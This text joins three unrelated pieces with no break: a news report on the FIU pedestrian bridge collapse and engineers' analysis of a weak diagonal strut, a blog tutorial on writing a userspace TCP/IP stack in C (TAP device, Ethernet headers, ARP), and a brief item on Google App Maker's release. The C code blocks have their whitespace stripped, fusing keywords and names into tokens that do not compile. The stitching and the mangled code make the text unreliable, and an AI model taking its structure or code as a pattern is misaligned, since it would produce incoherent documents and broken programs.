It started as an idea for a footbridge to get college students safely over the busy Tamiami Trail.

But fueled by millions of dollars in available federal stimulus grants, Florida International University's doomed pedestrian bridge morphed into something far more ambitious: A gleaming testament to FIU's lofty institutional aspirations and the linchpin in a grand plan to create a true college town in the neighboring working-class suburb of Sweetwater.

As FIU's ambitions grew, the need to shape a uniquely memorable bridge drove key engineering decisions, resulting in a striking but unorthodox concrete structure. But the design hid a fatal flaw that its designers and reviewers failed to recognize, according to experts who have examined plans and mathematical calculations for the project.

The unconventional placement of diagonal supports in an uneven zig-zag pattern along the bridge produced a complex structural web with a glaring weakness at a key connection point, apparently overlooked by designers at FIGG Bridge Group, say three independent structural engineers who reviewed nearly 2,000 pages of calculations for the bridge at the Miami Herald's request.

The weakness was likely a key factor in its fatal March 15 collapse, the independent engineers told the Herald.

The engineers believe FIGG significantly misjudged what would happen when a large amount of structural stress was placed on a single diagonal strut — a concrete brace that helped support the bridge — at the north end of the 174-foot span. That resulted in an undernourished strut and anchor that could not adequately bear the weight of the bridge and the substantial forces placed on them when the span was lifted into place over two support piers, the outside experts said. That joint is precisely where the bridge appears to have failed — and where potentially worrisome cracks began to appear even before the bridge was installed over the eight-lane road on March 10.

As a consequence of the apparent design error, the diagonal support at the span's north end was so overloaded that additional stress put on it by construction crews tightening internal support rods on March 15 likely caused it to separate from the walkway deck, instantly sending the entire 950-ton span crashing to the roadway in a chain reaction of structural failure, the engineers said. The accident killed one construction worker and five people sitting in cars at a stoplight below.

"The tensioning work could have pushed it over the edge," said Linwood Howell, an Austin-based engineer who is contracted to inspect bridges for the state of Texas.

This blue hydraulic jack was attached to a tensioning rod running through the bridge’s No. 11 strut — a concrete brace that helped support the span — in order to re-tension the structure. It’s not clear why workers were doing this, but independent engineers believe the procedure caused the No. 11 support to fail.

FIU and FIGG, which say they have been told by federal authorities not to discuss the collapse of the bridge in detail for the time being, said the National Transportation Safety Board's investigation must run its course before conclusions can be drawn. The engineers consulted by the Herald cautioned that the apparent design error may not be the sole cause of the collapse.

The span was an unusual re-interpretation of a traditional truss bridge, which is supported in part by a series of interconnected upright triangles. But FIU's bridge was designed to mimic the dramatic look of a cable-stayed bridge, where the deck is suspended from cables fanning out from a tall mast. In FIGG's design, though, the "cables" — actually metal pipes — were mostly just for show. The diagonal, v-shaped struts of the truss did the structural work.

To carry through the cable-stayed look, the struts had to line up with the pipes from the mast, resulting in a highly irregular arrangement that the experts say may have made the critical defect harder to detect than it might have been in a conventional truss design.

The FIU bridge was meant to mimic the look of a cable-stayed bridge. But the 'cables' were actually steel pipes that didn't play a structural role. And in order to pull off the aesthetic, the bridge's designers had to make the diagonal supports beneath them a variety of different shapes and sizes. That complication may have led the designers to miss a crucial error, independent engineers who've examined the bridge's plans believe: One of the supports was not strong enough.

David Beck

"It made the trusses more complicated," said David Beck, a New Hampshire engineer who helped the Boston Globe uncover mistakes in Boston's $10.8 billion Big Dig project. "If you were not trying to go ahead and conform to the aesthetics of the 10 cables ... the geometry on the trusses would have been more structurally efficient."

Crucially, had the strut and its connection to the walkway deck been stouter, the engineers say, the unusual bridge likely would have held up just fine. But FIGG's engineers appear not to have sufficiently considered potential vulnerabilities in their novel design, the experts concluded.

The Herald obtained the structural calculations and design plans through a public records request and shared them with the engineers. Howell and Beck, who both have expertise in bridge design and structural engineering, analyzed the plans and calculations independently but came to similar conclusions.

A third structural engineer with similar qualifications, Ralph Verrastro, closely examined the bridge plans but did not review the calculations and said he thus can't say whether there was a design weakness in the bridge. But he said the bridge design led to atypical details and unusual complications in the bridge move that could have played into the collapse.

"They were out on an edge," Verrastro said.

A fourth engineer, also a bridge expert who examined the FIGG calculations in detail, arrived at conclusions similar to those of Beck and Howell. The engineer asked not to be named.

The Herald did not compensate any of the engineers for their time or work, but flew Beck to Miami for a day to consult with reporters.

Workers stood on top of the bridge where they attached a hydraulic jack to tensioning rods. The rods were accessed through the protruding structures above the juncture of each support strut and the bridge’s canopy.

Kevin Scott Miami Herald staff

Only the NTSB can give an official account of why the bridge fell. But the federal agency's inquiry could take between one and two years from the date of the accident. Any conclusions drawn before then by outside experts do not serve the public's interest, the NTSB says.

"There is one agency tasked with conducting a comprehensive, independent and objective investigation into this bridge collapse and that’s the NTSB," Chris O'Neil, the agency's spokesman, said in an interview. "As qualified as other experts may be, if they are drawing conclusions about this accident, it is speculation at best. Unless you’re part of the investigative team, you may not be privy to all the information."

That information is no longer accessible to the public, however. The NTSB has severely restricted access to records related to the accident, leading the Miami Herald to file a lawsuit demanding access to documents that were previously available for public review under Florida public records laws.

All the engineers consulted by the Herald said their initial findings could change with further information gathered by the NTSB.

Even so — given the available evidence — the design for the bridge does not appear "structurally logical," Beck said.

While the singular design was unorthodox, it did fulfill FIU's aesthetic vision.

When two competing teams presented their plans for the bridge in 2015, only one struck Tom Gustafson, an FIU administrator and former speaker of the Florida House, as matching the grandeur sought by the university.

The proposal, by Munilla Construction Management, a politically connected South Florida construction company that has won local, state and federal contracts, and FIGG, a renowned bridge-design firm from Tallahassee, called for a sturdy concrete structure bedecked with a pylon tower for 10 imitation cables that could be dramatically lit at night. It also included amenities such as WiFi, planters, benches — even vendors selling FIU gear.

The rival plan, said Gustafson, a member of the selection committee, was simply conventional and banal.

"[The other design] is not a place I’m going to want to be. It’s not a place," Gustafson said, according to an audio recording of the meeting. "It’s a 12-foot-wide sidewalk across a busy highway and I don’t think that’s what we wanted."

He did not respond to a request for comment.

A simpler bridge — like the $6 million steel walkway constructed over South Dixie Highway by the University of Miami last year— would have been easier to design and build. The FIU bridge, made of more visually pleasing and longer-lasting concrete, cost $14.3 million and weighed nearly 10 times as much as UM's. FIU's consulting planners had at first envisioned something more similar to the UM project.

The University of Miami built a pedestrian bridge across South Dixie Highway that was far simpler than the doomed FIU project.

CARL JUSTE cjuste@miamiherald.com

Kenneth Jessell, chief financial officer for FIU, disputed the suggestion that the bridge's complexity played a role in its failure.

"Simplicity in design is not synonymous with safety, just as innovative design cannot be equated with lack of safety," he said in a statement.

Ron Sachs, a spokesman for FIGG, provided the following statement: "It is a breach of widely held professional standards of ethics for any engineer to judge or speculate on any aspect of a construction accident unless they have complete knowledge of all the facts, which include construction, materials, design, and other factors, and are highly experienced in bridge design."

Arthur Schwartz, deputy director and general counsel for the National Society of Professional Engineers, said independent engineers often use their expertise to shed light on tragedies such as Hurricane Harvey and the I-35 bridge collapse in Minnesota.

"I’m not aware of anything in our [ethics] code that says it’s unethical to render an opinion," as long as the engineer has studied the facts and circumstances of the incident and is properly trained, Schwartz said.

MCM, which built the bridge, said it could not respond because of the NTSB prohibition on doing so.

Survivors of the collapse and families of the dead have filed lawsuits alleging wrongful death and negligence. Their attorneys have also criticized the NTSB for denying them access to documents.

Bridge beginnings

The FIU project had its genesis in a simple need to provide a safe way for students and others to get across the Tamiami Trail from the school's main campus north to Sweetwater's compact main street, Southwest 109th Avenue.

Founded as a commuter school on a former airfield, FIU embarked on a massive building spree in the 1980s as it sought to become a top public university. It added medical and law schools and a football stadium and expanded science and engineering programs until its main campus was bursting at the seams, plagued by traffic logjams and a parking shortage. One solution administrators settled on: Get more students to live on campus or within walking distance.

So the university embraced an increasingly common alternative to dorms, recruiting private developers to build high-rise student housing across the Trail and a narrow canal in Sweetwater, a mostly immigrant city in need of an economic boost. FIU's plan soon expanded in scope to include improvements to Sweetwater's main drag, so its modest downtown could serve as a gathering place for college students. A broad new plaza at the center of campus would connect to Sweetwater through a new pedestrian and bike pathway and a bridge.

Sweetwater was hoping that the bridge over Tamami Trail and the adjacent canal would help give Southwest 109th Avenue, shown here, the feel of a college town.

Sam Navarro snavarro@MiamiHerald.com

The so-called "FIU University-City Prosperity Project" eventually ballooned into a $120 million vision that encompassed far more than just town-and-gown improvements, extending to campus trolleys and a transit station for Miami-Dade County's planned rapid-bus system in a new FIU parking garage alongside the Trail.

To help finance the Trail bridge and the campus and Sweetwater pedestrian projects, FIU turned to TIGER grants, which funded shovel-ready transportation plans as part of the Obama administration's stimulus package to help the country recover from the economic crash. FIU was awarded $21 million in federal funds for the overall project.

Because the bridge was the most visible piece of the University City grand plan, FIU did not seek an ordinary span, but felt it needed some design razzle-dazzle, university documents and brochures show.

Initially, FIU sought a cable-stayed bridge — that is, a bridge supported by cables hung from a tall pylon — and drew up renderings, according to its TIGER grant applications and other documents.

FIU had originally envisioned a more traditional design for its 'signature' pedestrian bridge, including this cable-stayed approach from an early conceptualization. But the construction of such a bridge would have blocked traffic down the busy Tamiami Trail far longer than the design ultimately chosen.

But FIU and its planning consultants, T.Y. Lin International, a global design and engineering firm, then settled on a different alternative: a time-tested truss structure, a common design consisting of a deck with open, V-shaped vertical supports on each side tied together at the top in a structural web.

Such structures are generally sturdy and reliable because they're "redundant" — meaning that failure of a single strut on one side would not bring down the entire bridge because the corresponding piece on the opposite side would still provide support. In creative designers' hands, truss bridges can also lend themselves to some flashy variations.

The Tokyo Gate Bridge in Japan is a dramatic 'truss' bridge that spans roughly 1.6 miles. The vertical supports on both edges of the bridge help hold it up.

Something else was also likely driving FIU's change of heart about the type of bridge it wanted: traffic.

As the bridge plan was being formalized, FIU had also begun promoting the use of an increasingly popular approach to bridge construction. In so-called Accelerated Bridge Construction, or ABC, bridge spans are prefabricated, then moved and hoisted into place in a matter of hours to avoid the long road closures so dreaded by motorists, highway authorities and elected officials.

FIU had launched and heavily promoted a center for ABC at its engineering school, and explicitly saw use of the technique for its pedestrian bridge as a demonstration of its efficiency.

Such quick-bridge construction effectively ruled out a true cable-stayed bridge. Cable-supported bridges are built in sections and in place, which requires extended road closures. Truss designs, in contrast, are ideal for the accelerated approach, engineers say.

Bid documents drawn up for the project by T.Y. Lin made it abundantly clear that FIU wanted no ordinary truss bridge. The document outlined a broad scope for the design of the pedestrian bridge, which would serve as a "landmark" for the school and a "gateway" for west Miami-Dade County.

"This structure should function as more than just a path for circulation; it should be a place to be and a place to be experienced, and the FIU campus and its students must be proud of it," the document's introduction reads. "It should be a destination in its own right where community members might linger, gather, and create an urban social space — a linear park."

Bid specifications emphasized the message that a conventional approach would not win the contract: "The selection criteria will be weighed heavily towards an innovative design that represents the intentions of this project, creating a distinctive landmark for the region."

The uneven spacing of diagonal struts — braces that helped support the FIU bridge — was meant to line up with pipes that were to be added above.

The specs called for a broad walkway at least 20 feet wide, but preferably 30 feet, and explicitly invited inventive "hybrid" variations on the truss design. But it also sought to establish some constraints.

The consultants sought a "primarily" steel structure with a concrete walkway. They also directly discouraged use of "non-redundant, fracture critical" designs — meaning designs in which failure of one structural element could lead to a catastrophic collapse. But they left the door open to other designs, saying those would be subject to approval by FIU.

What FIU got in the winning proposal by contractor MCM and FIGG was indeed unconventional. The MCM team easily outscored the other finalist, Facchina, with a design that offered everything FIU wanted, including fast-bridge construction and a structure that looked like — but was not in reality — a cable-stayed bridge.

MCM and FIGG proposed a highly unusual, hybrid version of a truss design. Instead of two sets of parallel, regularly spaced vertical truss pieces running along both edges of the bridge as in a straightforward truss, the bridge would have a single set of irregularly shaped struts running down the center of the bridge, tying together the deck and a shading canopy.

A standard truss bridge features two rows of supports. That way, if one side fails, the entire bridge may not collapse.

That approach had the advantage of giving the bridge an expansive, open look and feel. It would be built entirely of reinforced concrete, for a cleaner appearance and greater durability and ease of maintenance than plain steel.

But the design also appears to contravene T.Y. Lin's recommendations.

The bridge FIU ended up with was steel-reinforced concrete, and not primarily steel. Concrete can be harder to work with and more unforgiving, as well as substantially heavier than steel. The independent engineers and other outside experts say concrete truss bridges are exceedingly rare, and they can find no other design similar to the FIU bridge anywhere.

The single row of support struts, meanwhile, is precisely the kind of "non-redundant" design T.Y. Lin's specs sought to avoid. On the FIU bridge, the failure of a single strut could — and in fact, did — cause the entire span to fall because there was no backup support for it, the outside engineers say.

"It's only as strong as its weakest link," said Howell, the Texas-based bridge engineering expert who reviewed FIGG's calculations for the Herald.

Making things even more complicated was a decision to mimic the look, but not the function, of a cable-stayed bridge, Beck and Howell said. FIGG, which has said publicly the bridge is a truss design and not cable stayed, added a central pylon with mostly decorative steel pipes, instead of cables, connected to the bridge's canopy. FIGG said the pipes would help dampen vibrations from wind and people walking across.

That decision, the engineers said, determined the irregular size, spacing and angling of the diagonal truss support pieces, which had to line up with the pipes to complete the illusion of a cable-stayed bridge and give the span a dramatic profile visible from a distance, especially when lit up at night. The pylon was designed to be 109 feet tall to mark the location at 109th Avenue, a height that helped set the angles or the pipes and trusses, Beck said.

"The whole design is driven by the aesthetics," Howell said. "Bottom line is, FIGG is trying to be innovative to get the job. That's what they had to do. That's how they won the proposal."

Traditional truss bridges tend to have supports of equal size and geometry.

The engineers stress it's not uncommon for projects to put engineering at the service of aesthetics. But that means designers and engineers must then take extra care to make sure they understand the structure's function and look for potential flaws.

In the case of the FIU bridge, though, back-checking their conclusions appears to be where the school's contractors ran into trouble, the engineers say.

The faux cable-stayed bridge design created a highly irregular pattern for the diagonal struts. The irregular pattern, in turn, complicated the calculations for determining the stresses at different points and resulted in each of the 12 pieces being of different length and thickness, the three engineers who undertook a review of FIGG's calculations say.

The designers utilized two commonly used computer models to analyze stresses on their bridge design to determine the strength required for each structural piece. Beck and Howell, who say they did their own simpler calculations to back-check the numbers used by FIGG, concluded the figures in the firm's calculations significantly under-represent the forces working on the No. 11 truss piece, the last diagonal strut on the bridge's north end.

The ungainly spacing between the support structures of the FIU bridge was an aesthetic choice meant to line them up with the steel pipes above that gave the impression of a cable-stayed bridge. Too much stress was placed on the junction between the No. 11 beam, the deck and the No. 12 beam, according to independent engineers consulted by the Miami Herald.

FIGG design plans

The fourth engineer, who has asked not to be named, agreed that the point where the No. 11 strut met the deck was too weak to hold up once the span was installed over the roadway.

That's critical, Beck and Howell said, because the No. 11 strut bore the greatest stress of any of the diagonal pieces in the design in comparison to its strength.

"That configuration put heavy stress on one member, but for whatever reason, [the designers] did not realize it was underdesigned for the stress," Beck said.

"It's sitting there stressed to the limit," Howell said.

That resulted in a support piece that was likely not thick enough, and even more significantly, lacked sufficient steel rebar reinforcements at the point where it connected to the deck, all three engineers who reviewed the calculations said. That meant it could not adequately withstand the load of the bridge weight it was meant to carry, nor resist "shearing" stress at the connection to the deck that tended to pull the base of the diagonal strut from its anchor, they said.

By comparison, the diagonal piece at the opposite end of the span, No. 2, was a foot thicker and carried less structural stress, Beck and Howell pointed out.

Because the calculations don't fully show how FIGG derived its numbers, Beck and Howell said it's hard to say how the mistake may have been made. But they suggested that over-reliance on the computer models, a common pitfall in the profession, may have played into it.

It's difficult to tell who was responsible for the bridge designs and any possible errors, the three engineers who examined the calculations said. The plans are stamped by FIGG's chief engineer, W. Denney Pate, a lauded designer of bridges around the country and the engineer of record for the bridge.

But those three independent engineers say it's unclear how involved Pate was in design or oversight of the FIU bridge. Notes in the plans bear the notation "M.F.," the initials of a senior bridge engineer at FIGG. The engineers consulted by the Herald say FIGG would probably also have had a team of junior engineers working on it.

It's also unknown how thorough a check was conducted by Louis Berger, a large engineering firm hired to review the design. Both FIU and FDOT, in response to a public records request from the Herald, say they can't find relevant documents from Berger, other than a brief letter certifying the design plans. They were unable to locate even the contract laying out how much Berger was paid. The contract would probably also specify how thorough Berger's review of the design should be and how many hours its engineers should spend on the task.

"Louis Berger continues to review this matter and, at this time, cannot provide additional information as it is part of a government investigation and litigation," a spokeswoman for the firm said in an email.

Such peer reviews can be superficial. But the three outside engineers who studied the plan in detail said someone should have caught an error that Beck and Howell characterized as clear. FDOT and U.S. Department of Transportation engineers also reviewed the plans, emails released in response to a request by the Herald show.

"I would not accept these calculations. It really comes down to some kind of design error in this page," Howell said, referring to a place in the calculations focusing on the area of the No. 11 strut. "There is no way this connection is OK. I'm thinking this was not really checked. You want to do simple checks on your sophisticated program to make sure it's reasonable."

What appears certain, the three engineers who reviewed the calculations say, is that more concrete and more rebar pieces at the deck connection, and perhaps a thicker depth on the No. 11 truss piece, would have prevented catastrophe.

"They could properly design that pattern," Howell said, referring to the irregular structural design of the bridge. "There is nothing particularly difficult about it."

"If they had made member 11 three feet deep instead of two feet deep, we wouldn't be sitting here today," said Beck, as he conducted a review of the plans and calculations for reporters. "It wouldn't have failed, based on what I have seen so far."

All four engineers say other factors could have played a role in the bridge's failure, including last-minute design changes or defects in materials and workmanship.

The bridge was made of a novel titanium dioxide concrete mix, designed to be self-cleaning. Beck said the concrete at the point where the bridge failed shattered into unusually small pieces, suggesting it was highly brittle, though he can't say whether that had anything to with the collapse. Research into so-called Ti02 concrete shows if too much titanium dioxide is added into the mix, the concrete loses strength. FIU said its bridge was the first in the world made entirely of a Ti02 mix.

Other decisions by FIGG and MCM may have played into the collapse, the three engineers who looked at the calculations said. The installed span was only the main portion of the bridge, which would not have opened until next year. A shorter span connecting the north end across the canal to Sweetwater was to be built in place once the main span was up.

Because the back span would be structurally tied into the main span, the bridge would have been significantly stronger had the shorter portion been in place, they said. That could have ameliorated or even prevented the failure of the No. 11 piece, they say.

What the engineers say they still don't know is precisely how the No. 11 strut failed. That determination may have to await a report by the NTSB. The agency has barred the release of public records related to the bridge dated after Feb. 19.

The secrecy has precluded public scrutiny of some critical decisions by FIU's project team, including how they decided to handle cracks that had appeared on the bridge's north end before it collapsed, or what they thought had caused the cracking.

The cracks at the base of the No. 11 piece, which have drawn substantial public attention, could have been a sign that something within the structure was amiss — another critical element that the bridge designers and engineers on FIU's contracting team may have failed to fully account for, the three independent engineers who looked at the calculations say.

Cracks in concrete are common and often minor. But given the unconventional design of FIU's bridge, that should at the very least have prompted work to stop and an in-depth diagnosis to be conducted, including a fresh look at the structural calculations that should have uncovered any hidden deficiencies, those engineers said.

Cracks that developed in the support strut that later failed when the Florida International University bridge collapsed should have alerted the span's engineers that their design might have problems, outside experts told the Herald.

Florida International University

But records released by the Florida Department of Transportation before the NTSB issued its ban suggest FIGG engineers saw little reason to undertake a full reassessment, something that would have taken days if not weeks, the independent engineers note. FIGG's principal engineer, Pate, left a voicemail message for an FDOT official two days before the collapse to report that cracking had appeared, but added it did not appear to pose a safety hazard.

If the FIU team relied just on Pate's word, and not a thorough analysis, that was a serious error, Howell said.

"You don't accept a verbal reassurance," he said. "You want a report."

The three engineers who examined the plan calculations — as well as Verrastro, an ABC expert — conjecture that the move of the main span into position over the Trail may have been a contributing factor in the collapse. Because the bridge was lifted into place by two special transporters set toward the center, the ends of the span — designed to rest on pylons — would tend to sag under their own weight while being moved, the engineers say.

To counteract that sag, engineers added steel support rods into the two end diagonal pieces, No., 2 and No. 11. Documents show that, as planned, those rods were tensioned before the move to provide added support to the bridge ends while up in the air. They were then de-tensioned once the span was resting on the pylons, because the added support was not needed at that point.

Beck and Howell said they believe the underdesigned No. 11 node was possibly damaged by twisting and bending forces during the move, making it even more vulnerable to failure. Engineering plans for the move assumed that stresses on No. 11 had been properly calculated, and sensors placed along the span during the move would have warned FIU's team if those exceeded expected parameters.

Thus, the method of accelerated bridge construction, initially scrutinized as a possible contributor, was by itself likely not a probable cause of the accident, the engineers concur.

"The problem was not ABC, it was the execution," Beck said.

The NTSB recently confirmed for the first time that workers were tightening the No. 2 and No. 11 support rods when the bridge fell. The agency's brief report did not say why they were doing so. But the outside engineers say it may have been an attempt to close up cracks at the No. 11 connecting point.

The fact that workers were atop the bridge canopy in a possible effort to repair a defect while traffic continued to flow below strongly suggests that FIGG engineers remained unaware of the critical structural flaw at the No. 11 support, the engineers said.

At least one said that if so, it constitutes an avoidable mistake on a bridge that should never have been so complicated.

“This is not a big project," Beck said. "It’s a darn pedestrian bridge.”

The experts

David Beck

Global Engineering Advisors

David Beck is a New Hampshire-based structural engineer and construction manager with more than 40 years of national and international experience. He has planned, designed and managed major civil construction projects including bridges, power plants, offshore oil platforms, wastewater treatment facilities, oceanic outfalls, water and rail tunnels, and large urban traffic projects.

Linwood Howell

XR Structural

Linwood Howell is a senior engineer specializing in bridge engineering at XR Structural in Austin, Texas. The firm has been approved by the Texas Department of Transportation to inspect bridges in the state for over 30 years. Howell has inspected more than 20,000 bridges, designed more than 30 and has provided engineering services for bridge construction to dozens of contractors. Howell has expertise with truss bridges, having inspected and performed load ratings on nearly all the approximately 100 truss bridges on public roads in Texas.

Ralph Verrastro

Bridging Solutions

Ralph Verrastro graduated with a BS in civil engineering from Cornell University in 1976. His career includes bridge design experience throughout the United States and he is a registered professional engineer in 37 states. Verrastro specializes in the design, inspection, evaluation, technical supervision, and quality assurance/quality control for new and rehabilitation bridge projects. He is a technical expert in the use of fast track repair/replacement methods using prefabricated bridge components also known as Accelerated Bridge Construction. He has extensive experience in the evaluation and repair of historic metal truss bridges and concrete arch bridges. He has served as the specialty structural engineer for over 500 bridge structures throughout the United States. In 2018, he was named "Engineer of the Year" by the Florida Engineering Society.

A fourth engineer who reviewed plans and calculations asked not to be named.

Writing your own TCP/IP stack may seem like a daunting task. Indeed, TCP has accumulated many specifications over its lifetime of more than thirty years. The core specification, however, is seemingly compact - the important parts being TCP header parsing, the state machine, congestion control and retransmission timeout computation.

The most common layer 2 and layer 3 protocols, Ethernet and IP respectively, pale in comparison to TCP’s complexity. In this blog series, we will implement a minimal userspace TCP/IP stack for Linux.

The purpose of these posts and the resulting software is purely educational - to learn network and system programming at a deeper level.

To intercept low-level network traffic from the Linux kernel, we will use a Linux TAP device. In short, a TUN/TAP device is often used by networking userspace applications to manipulate L3/L2 traffic, respectively. A popular example is tunneling, where a packet is wrapped inside the payload of another packet.

The advantage of TUN/TAP devices is that they’re easy to set up in a userspace program and they are already being used in a multitude of programs, such as OpenVPN.

As we want to build the networking stack from the layer 2 up, we need a TAP device. We instantiate it like so:

/*
 * Taken from Kernel Documentation/networking/tuntap.txt
 */inttun_alloc(char*dev){structifreqifr;intfd,err;if((fd=open("/dev/net/tap",O_RDWR))<0){print_error("Cannot open TUN/TAP dev");exit(1);}CLEAR(ifr);/* Flags: IFF_TUN   - TUN device (no Ethernet headers)
     *        IFF_TAP   - TAP device
     *
     *        IFF_NO_PI - Do not provide packet information
     */ifr.ifr_flags=IFF_TAP|IFF_NO_PI;if(*dev){strncpy(ifr.ifr_name,dev,IFNAMSIZ);}if((err=ioctl(fd,TUNSETIFF,(void*)&ifr))<0){print_error("ERR: Could not ioctl tun: %s\n",strerror(errno));close(fd);returnerr;}strcpy(dev,ifr.ifr_name);returnfd;}

After this, the returned file descriptor fd can be used to read and write data to the virtual device’s ethernet buffer.

The flag IFF_NO_PI is crucial here, otherwise we end up with unnecessary packet information prepended to the Ethernet frame. You can actually take a look at the kernel’s source code of the tun-device driver and verify this yourself.

The multitude of different Ethernet networking technologies are the backbone of connecting computers in Local Area Networks (LANs). As with all physical technology, the Ethernet standard has greatly evolved from its first version, published by Digital Equipment Corporation, Intel and Xerox in 1980.

The first version of Ethernet was slow in today’s standards - about 10Mb/s and it utilized half-duplex communication, meaning that you either sent or received data, but not at the same time. This is why a Media Access Control (MAC) protocol had to be incorporated to organize the data flow. Even to this day, Carrier Sense, Multiple Access with Collision Detection (CSMA/CD) is required as the MAC method if running an Ethernet interface in half-duplex mode.

The invention of the 100BASE-T Ethernet standard used twisted-pair wiring to enable full-duplex communication and higher throughput speeds. Additionally, the simultaneous increase in popularity of Ethernet switches made CSMA/CD largely obsolete.

The different Ethernet standards are maintained by the IEEE 802.3 working group.

Next, we’ll take a look at the Ethernet Frame header. It can be declared as a C struct followingly:

#include <linux/if_ether.h>structeth_hdr{unsignedchardmac[6];unsignedcharsmac[6];uint16_tethertype;unsignedcharpayload[];}__attribute__((packed));

The dmac and smac are pretty self-explanatory fields. They contain the MAC addresses of the communicating parties (destination and source, respectively).

The overloaded field, ethertype, is a 2-octet field, that depending on its value, either indicates the length or the type of the payload. Specifically, if the field’s value is greater or equal to 1536, the field contains the type of the payload (e.g. IPv4, ARP). If the value is less than that, it contains the length of the payload.

After the type field, there is a possibility of several different tags for the Ethernet frame. These tags can be used to describe the Virtual LAN (VLAN) or the Quality of Service (QoS) type of the frame. Ethernet frame tags are excluded from our implementation, so the corresponding field also does not show up in our protocol declaration.

The field payload contains a pointer to the Ethernet frame’s payload. In our case, this will contain an ARP or IPv4 packet. If the payload length is smaller than the minimum required 48 bytes (without tags), pad bytes are appended to the end of the payload to meet the requirement.

We also include the if_ether.h Linux header to provide a mapping between ethertypes and their hexadecimal values.

Lastly, the Ethernet Frame Format also includes the Frame Check Sequence field in the end, which is used with Cyclic Redundancy Check (CRC) to check the integrity of the frame. We will omit the handling of this field in our implementation.

The attribute packed in a struct’s declaration is an implementation detail - It is used to instruct the GNU C compiler not to optimize the struct memory layout for data alignment with padding bytes. The use of this attribute stems purely out of the way we are “parsing” the protocol buffer, which is just a type cast over the data buffer with the proper protocol struct:

structeth_hdr*hdr=(structeth_hdr*)buf;

A portable, albeit slightly more laborious approach, would be to serialize the protocol data manually. This way, the compiler is free to add padding bytes to conform better to different processor’s data alignment requirements.

The overall scenario for parsing and handling incoming Ethernet frames is straightforward:

if(tun_read(buf,BUFLEN)<0){print_error("ERR: Read from tun_fd: %s\n",strerror(errno));}structeth_hdr*hdr=init_eth_hdr(buf);handle_frame(&netdev,hdr);

The handle_frame function just looks at the ethertype field of the Ethernet header, and decides its next action based upon the value.

The Address Resolution Protocol (ARP) is used for dynamically mapping a 48-bit Ethernet address (MAC address) to a protocol address (e.g. IPv4 address). The key here is that with ARP, multitude of different L3 protocols can be used: Not just IPv4, but other protocols like CHAOS, which declares 16-bit protocol addresses.

The usual case is that you know the IP address of some service in your LAN, but to establish actual communications, also the hardware address (MAC) needs to be known. Hence, ARP is used to broadcast and query the network, asking the owner of the IP address to report its hardware address.

The ARP packet format is relatively straightforward:

structarp_hdr{uint16_thwtype;uint16_tprotype;unsignedcharhwsize;unsignedcharprosize;uint16_topcode;unsignedchardata[];}__attribute__((packed));

The ARP header (arp_hdr) contains the 2-octet hwtype, which determines the link layer type used. This is Ethernet in our case, and the actual value is 0x0001.

The 2-octet protype field indicates the protocol type. In our case, this is IPv4, which is communicated with the value 0x0800.

The hwsize and prosize fields are both 1-octet in size, and they contain the sizes of the hardware and protocol fields, respectively. In our case, these would be 6 bytes for MAC addresses, and 4 bytes for IP addresses.

The 2-octet field opcode declares the type of the ARP message. It can be ARP request (1), ARP reply (2), RARP request (3) or RARP reply (4).

The data field contains the actual payload of the ARP message, and in our case, this will contain IPv4 specific information:

structarp_ipv4{unsignedcharsmac[6];uint32_tsip;unsignedchardmac[6];uint32_tdip;}__attribute__((packed));

The fields are pretty self explanatory. smac and dmac contain the 6-byte MAC addresses of the sender and receiver, respectively. sip and dip contain the sender’s and receiver’s IP addresses, respectively.

The original specification depicts this simple algorithm for address resolution:

?Do I have the hardware type in ar$hrd?
Yes: (almost definitely)[optionally check the hardware length ar$hln]
  ?Do I speak the protocol in ar$pro?
  Yes:[optionally check the protocol length ar$pln]
    Merge_flag :=falseIf the pair <protocol type, sender protocol address> is
        already in my translation table, update the sender
        hardware address field of the entry with the new
        information in the packet and set Merge_flag to true.
    ?Am I the target protocol address?
    Yes:
      If Merge_flag is false, add the triplet <protocol type,
          sender protocol address, sender hardware address> to
          the translation table.
      ?Is the opcode ares_op$REQUEST?  (NOW look at the opcode!!)
      Yes:
        Swap hardware and protocol fields, putting the localhardware and protocol addresses in the sender fields.
        Set the ar$op field to ares_op$REPLY
        Send the packet to the (new) target hardware address on
            the same hardware on which the request was received.

Namely, the translation table is used to store the results of ARP, so that hosts can just look up whether they already have the entry in their cache. This avoids spamming the network for redundant ARP requests.

The algorithm is implemented in arp.c.

Finally, the ultimate test for an ARP implementation is to see whether it replies to ARP requests correctly:

[saminiir@localhost lvl-ip]$ arping -I tap0 10.0.0.4
ARPING 10.0.0.4 from 192.168.1.32 tap0
Unicast reply from 10.0.0.4 [00:0C:29:6D:50:25]  3.170ms
Unicast reply from 10.0.0.4 [00:0C:29:6D:50:25]  13.309ms[saminiir@localhost lvl-ip]$ arp
Address                  HWtype  HWaddress           Flags Mask            Iface
10.0.0.4                 ether   00:0c:29:6d:50:25   C                     tap0

The kernel’s networking stack recognized the ARP reply from our custom networking stack, and consequently populated its ARP cache with the entry of our virtual network device. Success!

The minimal implementation of Ethernet Frame handling and ARP is relatively easy and can be done in a few lines of code. On the contrary, the reward-factor is quite high, since you get to populate a Linux host’s ARP cache with your own make-belief Ethernet device!

The source code for the project can be found at GitHub.

In the next post, we’ll continue the implementation with ICMP echo & reply (ping) and IPv4 packet parsing.

If you liked this post, you can share it with your followers and follow me on Twitter!

Kudos to Xiaochen Wang, whose similar implementation proved invaluable for me in getting up to speed with C network programming and protocol handling. I find his source code easy to understand and some of my design choices were straight-out copied from his implementation.

It’s been a year and a half since announced App Maker, its online tool for quickly building and deploying business apps on the web. The company has mostly remained quiet about App Maker ever since and kept it in a private preview mode, but today, it announced that the service is now generally available and open to all developers who want to give it a try.

Access to App Maker comes with any G Suite Business and Enterprise subscription, as well as the G Suite for Education edition. The overall idea here is to help virtually anybody in an organization — including those with little to no coding experience — to build their own line-of-business apps based on data that’s already stored in G Suite, Google’s Cloud SQL database or any other database that supports JDBC or that offers a REST API (that that’s obviously a bit more of an advanced operation).

To do this, App Maker provides users with a low-code application development environment that lets you build applications through a straightforward drag and drop environment. Though it takes a bit of work to set up the database connectivity, once that’s done, the actual design part looks to be pretty easy — and thanks to a set of responsive templates, those final applications should work, no matter whether you are on a phone or desktop.

While many applications will likely rely on a database, it’s worth noting that developers can access Gmail, Google Calendar, Sheets and other data sources as well. In total, App Maker offers access to 40 Google Services. Unlike other low-code services like Mendix, K2 or even Microsoft’s PowerApps tools, Google’s App Maker seems to focus mostly on Google’s own services and doesn’t offer built-in connectivity with third-party services like Salesforce, for example. Chances are, of course, that now that App Maker is out of preview, Google will start adding more functionality to the service.

